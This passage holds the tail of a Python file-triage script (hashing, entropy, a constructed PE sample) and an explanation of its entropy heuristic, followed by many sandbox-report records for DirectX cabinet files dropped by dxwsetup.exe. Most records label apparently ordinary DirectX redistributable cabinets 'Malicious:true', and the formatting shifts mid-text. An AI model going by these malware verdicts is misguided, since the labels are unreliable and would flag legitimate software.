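        md5=hashlib.md5(data).hexdigest().upper(),
        sha1=hashlib.sha1(data).hexdigest().upper(),
        sha256=hashlib.sha256(data).hexdigest().upper(),
        sha512=hashlib.sha512(data).hexdigest().upper(),
    )


def triage_file(path: str) -> DroppedFileRecord:
    with open(path, "rb") as fh:
        return triage_bytes(fh.read())


def build_minimal_pe(delphi: bool = False) -> bytes:
    """Constructed sample: 64-byte DOS header pointing at a bare PE32 header."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    if delphi:
        hdr[2] = ord("P")
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    coff = b"PE\x00\x00" + b"\x00" * 20                     # signature + COFF header
    return bytes(hdr) + coff + (0x10B).to_bytes(2, "little")  # optional-header magic


# Constructed inputs for demonstration, not files from the report.
SAMPLES = {
    "uniform": bytes(range(256)) * 64,        # every byte value equally likely: 8.0 bits
    "padded": b"A" * 165,                      # one symbol only: 0.0 bits
    "cab": b"MSCF" + bytes(range(256)) * 8,    # cabinet magic over a high-entropy body
    "delphi_pe": build_minimal_pe(delphi=True),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        r = triage_bytes(blob)
        print(f"{name:10} {r.size:6d} B entropy={r.entropy:.3f} "
              f"encrypted={r.encrypted} type={r.file_type} md5={r.md5}")
```

Point `triage_file()` at the sandbox's extracted dropped-files directory and compare the hashes against the records here before acting on them. Treat the Encrypted flag as what it is, an entropy heuristic: the LZX- and MSZIP-compressed DirectX cabinets above reach 7.999 bits per byte and are marked Encrypted:true although they are compressed, not encrypted, and a packed or encrypted payload would produce the same reading. Entropy separates "worth unpacking" from "plain", nothing finer.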
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 1391870 bytes, 5 files, at 0x44 +A "d3dx9_30_x64.cat" +A "d3dx9_30.dll", flags 0x4, ID 6646, number 1, extra bytes 20 in head, 123 datablocks, 0x1503 compression
Category: dropped
Size (bytes): 1401038
Entropy (8bit): 7.999678252363499
Encrypted: true
SSDEEP: 24576:qpSOf0NLgpl5UCjJlezBreTxpgDysu8tyDJhllXCQaXVVeOYa54Sx0HfWyRA7ydL:80xgpl5UCLezBrg4uDDJhlAQQn8Sk87a
MD5: 5EC6F520F3AFCC6494AB0D43B690EBD4
SHA1: 2359E14CB6DA44AA89A3815E905D6FFD81960D02
SHA-256: 27D99894E2A68601F46487C9999723DC83BCC9C6F903F2E2622D05668035B015
SHA-512: 9DB4A9581EDAE2681491D5E13228642737D0D186E0E1672B063482B2E699274ACFCB81DFA9631902E93E009ADC0BBD9447061830C8CE2FEAD6743E2D45AAED60
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
Category: dropped
Size (bytes): 1118429
Entropy (8bit): 7.999050518080374
Encrypted: true
SSDEEP: 24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
MD5: B3D644A116C54AFDA42A61B0058BE112
SHA1: 9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
SHA-256: CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
SHA-512: A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 173173 bytes, 6 files, at 0x44 +A "xact2_1_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
Category: dropped
Size (bytes): 182341
Entropy (8bit): 7.996367169399176
Encrypted: true
SSDEEP: 3072:iP7n/mIkqSEiqQAK23yLLBIvm2dozls4yaqS0yaP/Y5UZEPnQ79:iPL+fRqQAD3Tvxd8l/zsg5UZEIp
MD5: 6CA70CDB3FA575506BA4035E9A50D8E4
SHA1: A2A20F5F95A1AB293A188A55BF593A82EA0DCB7F
SHA-256: F82B2043B470BF0E711C3D05D758A379920340212437917B5D98AF0C14E7BFE0
SHA-512: A453CED526332ACE37861A0A862FFF3710EF74ED57965F28DD279F526A2F33C390E82FD2C49BEE75476E5B4C349C40A71EEE49EDAC720236A16780DFD700FE62
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 127143 bytes, 5 files, at 0x44 +A "xact2_1_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
Category: dropped
Size (bytes): 136311
Entropy (8bit): 7.992811243778454
Encrypted: true
SSDEEP: 1536:NqvFmCDJEmTNSPtjVgIc5Ul8IlTq3UJWaL6LHZF/U7a7b0qJFkd22ig3nQ1d7+Z/:NYmCyC5U+Il0yWYSMaXzkYQ3nWUZDuY
MD5: A2132A62F9AB0BDDC3207166DC014581
SHA1: 53B19AC3E6C6752011BA641EE3C409ED10C95DD9
SHA-256: 52C71C89CCC22FED3D7C985A22C464451AF34B63B3A26A3799BC25D881221EBC
SHA-512: 76FABD7F440B6F9B409B0B2635EAD4EF332563A9BED738A722A7C6B9A077094154BF735CAF02C67191B08AB0A19FC03E05EF3D984F6E34DCF3BD587A05D2F424
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 81141 bytes, 5 files, at 0x44 +A "xinput1_1_x64.cat" +A "xinput1_1.dll", flags 0x4, ID 7457, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
Category: dropped
Size (bytes): 90309
Entropy (8bit): 7.986243949537019
Encrypted: false
SSDEEP: 1536:/0CNqg1WzKHJUq/JSlvxToeSNOUp9BttldRL9zaMNez4fbI9YKztrIrm:/hIg1cEJUxvxlSNOUpfttldRL9zkzAI5
MD5: B0669F7D395078BEE0087B089F0B45C5
SHA1: 30506FC3DCE9532EF0A8CB3973347EC9C3C9875F
SHA-256: E63A67783EF7624559F95AB697BF8AFBDAB7ACE31200283EF840E6B94AA16E5A
SHA-512: D7EFCFD85B3CB6CB9B1936B701A9D7D91A6094AA08D8C933EDF8493C6AD57BE05A579980A404B35E9721F71B45F4CAE28399FCA3FF5DF20A9A3138B90F86B94C
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
Category: dropped
Size (bytes): 49218
Entropy (8bit): 7.962835058038329
Encrypted: false
SSDEEP: 768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
MD5: E207FB904E641246F3F7234DB74121FC
SHA1: 1BE8C50C074699BDD9184714E9022B7A2F8BF928
SHA-256: 3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
SHA-512: ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 692652 bytes, 7 files, at 0x44 +A "d3dx10_33_x64.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 10164, number 1, extra bytes 20 in head, 61 datablocks, 0x1503 compression
Category: dropped
Size (bytes): 701820
Entropy (8bit): 7.999560976493214
Encrypted: true
SSDEEP: 12288:RK6/uIaEOb2fc+HdQn/lDTK79RrFEYnj3LUFWQJcR1WrADy2IYxUSsEtiqUoY:RUlb2fc+9Qn/u9RrFEO3LUjU95I/EtiL
MD5: 906318E8C444DAAAEA30550D5024F235
SHA1: 3F3DCCF0A8A1CBF6F603BE1DA02E1E2BF89D24FC
SHA-256: 1A37565C5B868B6A5C67F3E24B8AF547506799444CB77C7086E7B0CEC852F239
SHA-512: 0A7AED2F49EA3DCBCA1607FC46F166A44BC9D08589DB05051B422C8AD84ADF322352F71333367C612F9579B4AACB4CD6B82489DDF168AD67FB4D42AB52999C88
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
Category: dropped
Size (bytes): 699073
Entropy (8bit): 7.998968028413629
Encrypted: true
SSDEEP: 12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
MD5: F784B8A0FD84C8AC3F218A9842D8DA56
SHA1: FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
SHA-256: 949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
SHA-512: 01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 1601398 bytes, 6 files, at 0x44 +A "d3dx9_33_x64.cat" +A "d3dx9_33.dll", flags 0x4, ID 8295, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
Category: dropped
Size (bytes): 1610566
Entropy (8bit): 7.999804070832858
Encrypted: true
SSDEEP: 24576:NjzSeifTXjfzuO/m35sCqSrSBEZqyi2bjbBfQbIKpP5FfiB0Qjq/X1ZXp8e:NvSeSTXj7u0OUM9UStQbNd/Gjq/FD
MD5: F33C12F535DC4121E07938629BC6F5B2
SHA1: 6B93FBE3D419670A71813E087D289B77E58E482B
SHA-256: 3CA2ACF6B952D6438B91E540F39ABCB93EE12E340BA1302F7406F01568E5CF91
SHA-512: DF1753AB43D5B7FDE2A5EB65A77B37BA28599BC0683A4306F101C75F82B0F1A2C8DDF5741981073CC5DF26E9EA38C9A495ED0FB1689D2E7FC7D6F693759C822A
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
Category: dropped
Size (bytes): 1609247
Entropy (8bit): 7.999284261824255
Encrypted: true
SSDEEP: 24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
MD5: A5915EC0BE93D7EEBE8800CE761EE6DC
SHA1: E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
SHA-256: EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
SHA-512: 02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 189806 bytes, 7 files, at 0x44 +A "xact2_7_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 10116, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
Category: dropped
Size (bytes): 198974
Entropy (8bit): 7.996718266567073
Encrypted: true
SSDEEP: 6144:kr+0amjUgjJG0HRzMUxWDJkUMP9KeK17dq569:krPVzjf+pk9keKdq5q
MD5: FBB6AA140D5D0AA28A7561EA15D69E72
SHA1: 26804276EDBB1EE23B96690B40A01BB9C723F7DA
SHA-256: 7781F0494648989583D4AC7695B9C5310EEA76B6A102E15EA0FC7376250E4584
SHA-512: 08D6F2EF3346229F71E9FD6904D99BCB69F0A03CBD2D428F0A3BA58836694B801446165814AEE120B4C5EB7046184B08FB49248F5E1941579B9CAEAF9FBA1B1A
Malicious: true
Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 145265 bytes, 6 files, at 0x44 +A "xact2_7_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 9001, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
Category: dropped
Size (bytes): 154433
Entropy (8bit): 7.994491966822324
Encrypted: true
SSDEEP: 3072:BcJ4S2kOBrMASnHr7M58QmpeFT7582Skd1ksaIwbhQDp9kkIFxYJQZW9379+:BQ4S2kOi/MKbSV82xKnDVQ/EqQZa3k
MD5: 8922189C0A46D26B2C52C65515D87180
SHA1: 27830C01AFB15158186A045B7224EF33793AD211
SHA-256: 39F970BF4CC42E9325ADA84A603C6C691BF94921385A52325F402F7432ACE697
SHA-512: 53D51CAA2CF448681A709F2B9737EF75DEA4E9A46E2B29E6588B13E941671643A64D3597649AA2AE0B1FE9E5D591ED00BAD9FF3344CA62851E03A68279142CAB
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 100025
Entropy (8bit): 7.988437274786544
Encrypted: false
SSDEEP: 3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
MD5: FAE84E0773A74F367124C6D871516B7B
SHA1: CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
SHA-256: 86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
SHA-512: CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
Category: dropped
Size (bytes): 56510
Entropy (8bit): 7.973777529821975
Encrypted: false
SSDEEP: 1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
MD5: B362EC93463D8B6381A864D35D38C512
SHA1: 7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
SHA-256: B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
SHA-512: CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 1344582 bytes, 5 files, at 0x44 +A "d3dx9_27_x64.cat" +A "d3dx9_27.dll", flags 0x4, ID 6663, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
Category: dropped
Size (bytes): 1353750
Entropy (8bit): 7.999671999388792
Encrypted: true
SSDEEP: 24576:eG/1unuf7Ga2dGKSnUG+zOADaZmd+JzQpymAFVZcRVhZ9k7LN7QDKW+L:eg4G7GaISn+6FZC+5vmC7EUNRWU
MD5: A9F4068650DF203CEE34E2CA39038618
SHA1: CD8CAECEECD01DAC35B198B42725CBEB5B7965A7
SHA-256: 3500C1A7CFB5594521338D1C29946D1E4FFA44D5B6BC6CF347C5BBBDE18E94DC
SHA-512: C92FB461B53051A22FB480BA5B6BF2706614AE93BE055B00280BE4DACE19C1F2A9327106A71851B0E42F39E4172EA3A027F7CE878BCBCB252B723EEA49DBCF1B
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
Category: dropped
Size (bytes): 1080852
Entropy (8bit): 7.999138982152864
Encrypted: true
SSDEEP: 24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
MD5: 3E91448A7481A78318DCE123790EE31A
SHA1: AE5FE894790624BAD3E59234577E5CB009196FDF
SHA-256: 8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
SHA-512: F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 176943 bytes, 6 files, at 0x44 +A "xact2_3_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
Category: dropped
Size (bytes): 186111
Entropy (8bit): 7.995685991314543
Encrypted: true
SSDEEP: 3072:yglGrmTM3Ne3LnSYZr66OltMlRz/EFa6xoXJMOL7CmAvyl81g5K7VQLWRrZL:xESKSRr66OltMlWFa6xoMOL7vmGGCArN
MD5: 4BA26F9DCCAEBD7BE849A076EC82D6FF
SHA1: 42FB0D0089D8BC92735820F475968F59AF4E4365
SHA-256: 13E7EB934A7596E7C3B7D8A0962E68DA841D9C73D154825DC982FF6D05CFF221
SHA-512: 4E4FD8A31AC3C2F8CC66D434103C0097AB3FBE2C2E8140AAE2F95FC4AC1927AAE9CDCE8730DD7C4DAD785D9A653D90B0F914B258BB5695C68CA93F605AC82DD4
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 131275 bytes, 5 files, at 0x44 +A "xact2_3_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
Category: dropped
Size (bytes): 140443
Entropy (8bit): 7.993872348182751
Encrypted: true
SSDEEP: 3072:ZLkEev6VCdOQKPuF/p+emNC4J962LGMlPj6MoCW37gwND08:ZLkEeKCdsPufE59tLGMpxobsG08
MD5: E16F0875713956A6F9CD8C5ACAD36E51
SHA1: 984B821EAEF3B549CE0B12F72A405A93E51A9DFE
SHA-256: 31B16F93BE7F5F9BB78E9ECE6DA96565D50A0BC1F66B206B7A21C601A308DC53
SHA-512: DD626D5552EAF0C1DBD32BC4DD84811BACE74C6350EDDAC692D3C3E8C393F4A19C26E8F2932F54A14648448912E6B87C796C6EEB6DA9B2C55EC4565983B76189
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 81182 bytes, 5 files, at 0x44 +A "xinput1_2_x64.cat" +A "xinput1_2.dll", flags 0x4, ID 7454, number 1, extra bytes 20 in head, 5 datablocks, 0x1 compression
Category: dropped
Size (bytes): 90350
Entropy (8bit): 7.985841057262195
Encrypted: false
SSDEEP: 1536:5lQFOMW9t2gGQtmxC4LbB8GXjgvW/j44krD+W2MLdk6v5yO1Ha6DB/4RPjz6ITda:rIOMWm+tmnbXjVkWW1lgO166cjz6z
MD5: A9D582E44E46E36F37EDB7CBC761179D
SHA1: ED1BEF64385E94CE89AFA704D38408E23B31FA79
SHA-256: C26633D38E0A91B9BE70382E916A83D50E219609F7E05CFB2D27DFAFBE480B43
SHA-512: 20011BFB547DEDCE8E6FCEDA22C3A3A83DB140E8A20844F3B0E8741B4474C1FEA73D84708B801E83EAE3CD2D8A2D6C851C3F7CD0154C0382A78BC2C2DF6B01E5
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
Category: dropped
Size (bytes): 49266
Entropy (8bit): 7.9632460736333766
Encrypted: false
SSDEEP: 768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
MD5: 16B968CA0C435EE45E77A84C2D0364A9
SHA1: 90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
SHA-256: 6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
SHA-512: 3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
Category: dropped
Size (bytes): 800075
Entropy (8bit): 7.9986813742013325
Encrypted: true
SSDEEP: 24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
MD5: DDC4AF0D53B477E5AF77942E7118B66E
SHA1: 81AD8201DCF653A6E977C4506A274D0BAC12643C
SHA-256: 9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
SHA-512: 1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
Category: dropped
Size (bytes): 1711360
Entropy (8bit): 7.999186916403002
Encrypted: true
SSDEEP: 24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
MD5: 3ED592E6CDAE66B1C0671D9EC417A738
SHA1: 9F083FFE00A8E5EABF282130CD16044B488B6E0D
SHA-256: 4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
SHA-512: 0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
File Type: Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
Category: dropped
Size (bytes): 852375
Entropy (8bit): 7.998886184584254
Encrypted: true
SSDEEP: 24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
MD5: 5380053AC4C344BD38604022476B1C1D
SHA1: 043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
SHA-256: 84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
SHA-512: F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
Malicious: true
                                                                                              Preview:MSCF............D................"...............#..............=....$.........8 X..d3dx10_39.dll......$.....8.X..D3DCompiler_39.dll.f(..(......8.2..d3dx10_39_x86.cat.I..........8.2..d3dx10_39_x86.inf.i..........8.2..d3dx10_39_x86_xp.inf.c...@......8.2..Aug2008_d3dx10_39_x86.inf.,"..%,..CK..\.....\./.R3...$...Hef.K0..D<....V..uvA4.J.yTx..YjvY..<.2.133.J.[...O.g.Q.J..gf.....r^.}..s~g..3...F..!...eB>$.e .~..Z.j@V....C]..-..-N.!.Dc.c2.lv..!0b......$&.n.....yH..cz./...|...w.;y../+.......l.|~...?...{..-<Us.(n..M.U...(Bz.I.WCc.q.I..uuu....2O.K}.~_x...P..B.D.P.].C-e..O..x.tJ.....Y....'o5%dE...+..../..".tp...Ap..i^.$.0W.....!...b../.W..y.B.....#.m.k}O.k..z...N........W.3.......S.F..].E..j,.;.xe..I`6p.V..._O..K`.H.C....f.....'..3@?@O..`...@&p..P...W..>HO.....,..CA........0...m.....D....0.....x.S...l.....'....`.....%....{....1y.t...Qp.t..{..A.0c.......k.....@!x......RA/.....@c......}...n.......`.x.L.cA...A ...P..S....2}{%".,....d8..^.K..p.xGE...+..\`:X.>.G.o.Y
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
